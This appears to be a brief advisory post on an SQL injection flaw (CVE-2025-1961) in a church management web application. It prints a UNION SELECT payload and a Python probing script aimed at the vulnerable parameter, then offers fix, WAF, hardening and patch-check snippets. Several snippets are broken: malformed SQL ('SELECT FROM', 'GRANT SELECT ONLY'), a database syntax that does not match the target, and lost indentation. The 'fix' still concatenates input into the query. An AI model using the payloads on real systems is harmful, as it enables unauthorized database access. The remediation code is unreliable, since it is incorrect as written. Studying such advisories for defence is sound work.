SourceCodester Best Church Management Software, SQL Injection, CVE-2025-1961 (Critical)

By /

How CVE-2025-1961 Works

The vulnerability exists in the `/admin/app/web_crud.php` file of SourceCodester Best Church Management Software 1.1. The application fails to properly sanitize user-supplied input in the `encryption` parameter, allowing attackers to inject malicious SQL queries. When crafted SQL payloads are passed through this parameter, the backend database interprets them as legitimate commands. This occurs due to improper input validation before constructing SQL statements. The vulnerability can be exploited remotely without authentication, enabling attackers to read, modify, or delete database contents. The exposed functionality handles sensitive church management data, making this a critical security issue.

DailyCVE Form

Platform: SourceCodester Church Management
Version: 1.1
Vulnerability: SQL Injection
Severity: Critical
Date: 04/29/2025

What Undercode Say:

-- Exploit PoC (sanitized for educational purposes)
/admin/app/web_crud.php?encryption=1' UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- -

Vulnerability check script
import requests
target = "http://target/admin/app/web_crud.php"
payload = "1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"
response = requests.get(target, params={"encryption": payload})
if "conversion failed" in response.text:
print("Vulnerable to SQLi")

// Secure coding fix
$encryption = mysqli_real_escape_string($conn, $_GET['encryption']);
$query = "SELECT FROM data WHERE encryption = '$encryption'";

WAF rule to block exploitation
SecRule ARGS_GET:encryption "@detectSQLi" "id:1001,deny,status:403,msg:'SQLi Attempt'"

-- Database hardening
REVOKE ALL PRIVILEGES ON church_db. FROM 'webuser'@'%';
GRANT SELECT ONLY ON church_db. TO 'webuser'@'%';

Automated patch verification
import subprocess
def check_patch():
result = subprocess.run(['grep', 'mysqli_real_escape_string', '/admin/app/web_crud.php'], stdout=subprocess.PIPE)
return result.returncode == 0

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top